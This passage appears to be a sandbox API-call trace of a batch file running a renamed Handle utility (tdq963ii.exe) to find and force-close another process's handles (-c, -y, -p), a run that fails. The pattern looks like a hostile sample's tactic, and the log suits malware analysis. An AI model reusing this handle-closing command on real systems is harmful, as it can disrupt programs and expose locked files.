lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2eef6c*=0x26) returned 1 [0228.056] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x2ef1fc | out: _Buffer="FOR") returned 3 [0228.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.056] GetFileType (hFile=0x7) returned 0x2 [0228.057] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.057] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1bc | out: lpMode=0x2ef1bc) returned 1 [0228.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.057] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2ef1e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef1e8*=0x3) returned 1 [0228.057] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x2ef1fc | out: _Buffer=" /F") returned 3 [0228.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.057] GetFileType (hFile=0x7) returned 0x2 [0228.058] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.058] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1bc | out: lpMode=0x2ef1bc) returned 1 [0228.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.058] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2ef1e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef1e8*=0x3) returned 1 [0228.058] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x2ef1fc | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0228.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.058] GetFileType (hFile=0x7) returned 0x2 [0228.059] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.059] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1bc | out: lpMode=0x2ef1bc) returned 1 [0228.059] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.059] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x2ef1e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef1e8*=0x20) returned 1 [0228.059] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x2ef1fc | out: _Buffer=" %I IN ") returned 7 [0228.059] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.059] GetFileType (hFile=0x7) returned 0x2 [0228.060] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.060] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1bc | out: lpMode=0x2ef1bc) returned 1 [0228.205] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.205] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2ef1e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef1e8*=0x7) returned 1 [0228.939] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x2ef1f8 | out: _Buffer="(`tdq963ii.exe -accepteula \"mxslipstream.exe\" -nobanner`) DO ") returned 61 [0228.939] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.939] GetFileType (hFile=0x7) returned 0x2 [0228.940] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.940] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1b8 | out: lpMode=0x2ef1b8) returned 1 [0228.940] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.940] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3d, lpNumberOfCharsWritten=0x2ef1e4, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef1e4*=0x3d) returned 1 [0228.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.941] GetFileType (hFile=0x7) returned 0x2 [0228.941] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.941] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1c4 | out: lpMode=0x2ef1c4) returned 1 [0228.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.941] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2ef1f0, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x2ef1f0*=0x1) returned 1 [0228.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.941] GetFileType (hFile=0x7) returned 0x2 [0228.942] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.942] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1a8 | out: lpMode=0x2ef1a8) returned 1 [0228.942] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.942] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3a4340*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x2ef1d4, lpReserved=0x0 | out: lpBuffer=0x3a4340*, lpNumberOfCharsWritten=0x2ef1d4*=0xc) returned 1 [0228.942] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef1e0 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0228.942] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.942] GetFileType (hFile=0x7) returned 0x2 [0228.943] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.943] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1a0 | out: lpMode=0x2ef1a0) returned 1 [0228.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.943] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2ef1cc, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef1cc*=0x26) returned 1 [0228.945] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef1fc | out: _Buffer=") ") returned 2 [0228.945] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.945] GetFileType (hFile=0x7) returned 0x2 [0228.945] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.945] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1bc | out: lpMode=0x2ef1bc) returned 1 [0228.946] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.946] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef1e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef1e8*=0x2) returned 1 [0228.946] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef21c | out: _Buffer="\r\n") returned 2 [0228.946] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.946] GetFileType (hFile=0x7) returned 0x2 [0228.946] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.946] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1dc | out: lpMode=0x2ef1dc) returned 1 [0228.947] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.947] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef208, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef208*=0x2) returned 1 [0228.948] GetProcessHeap () returned 0x390000 [0228.948] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x2c) returned 0x3a43c8 [0228.948] GetProcessHeap () returned 0x390000 [0228.948] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xc) returned 0x390db8 [0228.948] GetProcessHeap () returned 0x390000 [0228.948] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xc) returned 0x390dd0 [0228.949] GetProcessHeap () returned 0x390000 [0228.949] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xe) returned 0x390de8 [0228.949] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0228.949] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0228.949] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0228.949] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0228.949] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0228.949] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0228.949] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0228.949] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x2ef138, _Radix=0 | out: _EndPtr=0x2ef138*=",6 delims=: \"") returned 3 [0228.949] wcstol (in: _String="6 delims=: \"", _EndPtr=0x2ef138, _Radix=0 | out: _EndPtr=0x2ef138*=" delims=: \"") returned 6 [0228.949] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0228.949] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0228.949] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0228.949] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0228.949] GetProcessHeap () returned 0x390000 [0228.949] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x390de8 | out: hHeap=0x390000) returned 1 [0228.949] GetProcessHeap () returned 0x390000 [0228.949] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xe) returned 0x390de8 [0228.949] GetProcessHeap () returned 0x390000 [0228.949] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x390db8, Size=0xe) returned 0x390e00 [0228.949] GetProcessHeap () returned 0x390000 [0228.949] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x390e00) returned 0xe [0228.949] GetProcessHeap () returned 0x390000 [0228.949] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x390dd0, Size=0x14) returned 0x3912a0 [0228.949] GetProcessHeap () returned 0x390000 [0228.949] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3912a0) returned 0x14 [0228.949] _wpopen (_Command="tdq963ii.exe -accepteula \"mxslipstream.exe\" -nobanner", _Mode="rb") returned 0x77032960 [0228.962] feof (_File=0x77032960) returned 0 [0228.962] ferror (_File=0x77032960) returned 0 [0228.963] GetProcessHeap () returned 0x390000 [0228.963] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x108) returned 0x3a4400 [0228.963] fgets (in: _Buf=0x3a4408, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0233.282] feof (_File=0x77032960) returned 0 [0233.282] ferror (_File=0x77032960) returned 0 [0233.282] GetProcessHeap () returned 0x390000 [0233.282] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3a4400, Size=0x208) returned 0x3a4400 [0233.282] GetProcessHeap () returned 0x390000 [0233.282] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3a4400) returned 0x208 [0233.283] fgets (in: _Buf=0x3a444e, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0233.283] feof (_File=0x77032960) returned 0 [0233.283] ferror (_File=0x77032960) returned 0 [0233.283] GetProcessHeap () returned 0x390000 [0233.283] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3a4400, Size=0x308) returned 0x3a4400 [0233.283] GetProcessHeap () returned 0x390000 [0233.283] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3a4400) returned 0x308 [0233.283] fgets (in: _Buf=0x3a4451, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0234.204] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0234.206] GetProcessHeap () returned 0x390000 [0234.206] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3a4400, Size=0x9e) returned 0x3a4400 [0234.207] GetProcessHeap () returned 0x390000 [0234.207] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3a4400) returned 0x9e [0234.207] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x3a4451, cbMultiByte=73, lpWideCharStr=0x3a4408, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0234.208] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2eee2c | out: _Buffer="\r\n") returned 2 [0234.208] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.208] GetFileType (hFile=0x7) returned 0x2 [0234.208] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.208] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eedec | out: lpMode=0x2eedec) returned 1 [0234.208] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.209] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2eee18, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eee18*=0x2) returned 1 [0234.211] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0234.211] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2eee28 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0234.211] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2eee28 | out: _Buffer=">") returned 1 [0234.211] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.211] GetFileType (hFile=0x7) returned 0x2 [0234.211] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.211] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eedf0 | out: lpMode=0x2eedf0) returned 1 [0234.212] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.212] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2eee1c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2eee1c*=0x26) returned 1 [0234.212] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.212] GetFileType (hFile=0x7) returned 0x2 [0234.213] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.213] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef074 | out: lpMode=0x2ef074) returned 1 [0234.213] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.213] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2ef0a0, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x2ef0a0*=0x1) returned 1 [0234.214] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.214] GetFileType (hFile=0x7) returned 0x2 [0234.214] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.214] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef058 | out: lpMode=0x2ef058) returned 1 [0234.214] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.214] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3b4bd0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x2ef084, lpReserved=0x0 | out: lpBuffer=0x3b4bd0*, lpNumberOfCharsWritten=0x2ef084*=0xc) returned 1 [0234.215] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef090 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0234.215] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.215] GetFileType (hFile=0x7) returned 0x2 [0234.215] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.215] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef050 | out: lpMode=0x2ef050) returned 1 [0234.216] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.216] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x2ef07c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef07c*=0x2c) returned 1 [0234.218] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef0ac | out: _Buffer=") ") returned 2 [0234.218] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.218] GetFileType (hFile=0x7) returned 0x2 [0234.219] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.219] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef06c | out: lpMode=0x2ef06c) returned 1 [0234.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.219] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef098, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef098*=0x2) returned 1 [0234.220] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef0cc | out: _Buffer="\r\n") returned 2 [0234.220] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.220] GetFileType (hFile=0x7) returned 0x2 [0234.220] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.220] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef08c | out: lpMode=0x2ef08c) returned 1 [0234.220] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.220] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef0b8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef0b8*=0x2) returned 1 [0234.222] GetConsoleTitleW (in: lpConsoleTitle=0x2eebdc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.224] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a4750, lpFilePart=0x2ee6fc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ee6fc*="Desktop") returned 0x25 [0234.224] SetErrorMode (uMode=0x0) returned 0x1 [0234.224] GetProcessHeap () returned 0x390000 [0234.224] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3a4748, Size=0x6e) returned 0x3a4748 [0234.224] GetProcessHeap () returned 0x390000 [0234.224] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3a4748) returned 0x6e [0234.224] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.224] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0234.224] GetProcessHeap () returned 0x390000 [0234.224] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x120) returned 0x3a47c0 [0234.224] GetProcessHeap () returned 0x390000 [0234.224] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x238) returned 0x3a48e8 [0234.225] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.225] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x2ee498, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee498) returned 0x3a4a98 [0234.225] FindClose (in: hFindFile=0x3a4a98 | out: hFindFile=0x3a4a98) returned 1 [0234.225] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0234.225] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0234.225] GetConsoleTitleW (in: lpConsoleTitle=0x2ee970, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.226] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ee7f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ee8c0 | out: lpAttributeList=0x2ee7f8, lpSize=0x2ee8c0) returned 1 [0234.226] UpdateProcThreadAttribute (in: lpAttributeList=0x2ee7f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ee8b8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ee7f8, lpPreviousValue=0x0) returned 1 [0234.226] GetStartupInfoW (in: lpStartupInfo=0x2ee7b4 | out: lpStartupInfo=0x2ee7b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0234.226] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0234.226] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ee854*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ee8a0 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x2ee8a0*(hProcess=0x74, hThread=0x84, dwProcessId=0x570, dwThreadId=0x3f8)) returned 1 [0234.241] CloseHandle (hObject=0x84) returned 1 [0234.241] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0234.241] GetProcessHeap () returned 0x390000 [0234.241] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a76e0 | out: hHeap=0x390000) returned 1 [0234.242] GetEnvironmentStringsW () returned 0x3a6b50* [0234.242] GetProcessHeap () returned 0x390000 [0234.242] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xb88) returned 0x3a76e0 [0234.242] FreeEnvironmentStringsW (penv=0x3a6b50) returned 1 [0234.242] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0237.800] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x2ee794 | out: lpExitCode=0x2ee794*=0x1) returned 1 [0237.801] CloseHandle (hObject=0x74) returned 1 [0237.801] _vsnwprintf (in: _Buffer=0x2ee8dc, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ee7a0 | out: _Buffer="00000001") returned 8 [0237.801] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0237.801] GetProcessHeap () returned 0x390000 [0237.801] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a76e0 | out: hHeap=0x390000) returned 1 [0237.801] GetEnvironmentStringsW () returned 0x3a6b50* [0237.801] GetProcessHeap () returned 0x390000 [0237.801] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xb88) returned 0x3a76e0 [0237.801] FreeEnvironmentStringsW (penv=0x3a6b50) returned 1 [0237.801] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0237.801] GetProcessHeap () returned 0x390000 [0237.801] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a76e0 | out: hHeap=0x390000) returned 1 [0237.801] GetEnvironmentStringsW () returned 0x3a6b50* [0237.801] GetProcessHeap () returned 0x390000 [0237.801] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xb88) returned 0x3a76e0 [0237.801] FreeEnvironmentStringsW (penv=0x3a6b50) returned 1 [0237.801] GetProcessHeap () returned 0x390000 [0237.801] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x390dd0 | out: hHeap=0x390000) returned 1 [0237.801] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ee7f8 | out: lpAttributeList=0x2ee7f8) [0237.802] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.802] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0237.803] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.803] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0237.851] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.851] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0237.852] SetConsoleInputExeNameW () returned 0x1 [0237.852] GetConsoleOutputCP () returned 0x1b5 [0237.852] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0237.852] SetThreadUILanguage (LangId=0x0) returned 0x409 [0237.852] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ef1c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0237.853] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0237.853] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.853] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0237.853] GetProcessHeap () returned 0x390000 [0237.853] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4a18 | out: hHeap=0x390000) returned 1 [0237.853] GetProcessHeap () returned 0x390000 [0237.853] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a48e8 | out: hHeap=0x390000) returned 1 [0237.853] GetProcessHeap () returned 0x390000 [0237.853] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a47c0 | out: hHeap=0x390000) returned 1 [0237.853] GetProcessHeap () returned 0x390000 [0237.853] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4748 | out: hHeap=0x390000) returned 1 [0237.853] GetProcessHeap () returned 0x390000 [0237.853] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a46c0 | out: hHeap=0x390000) returned 1 [0237.853] GetProcessHeap () returned 0x390000 [0237.853] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a44a8 | out: hHeap=0x390000) returned 1 [0237.853] GetProcessHeap () returned 0x390000 [0237.853] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3b4c10 | out: hHeap=0x390000) returned 1 [0237.853] GetProcessHeap () returned 0x390000 [0237.853] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3b4bc8 | out: hHeap=0x390000) returned 1 [0237.853] GetProcessHeap () returned 0x390000 [0237.853] HeapFree 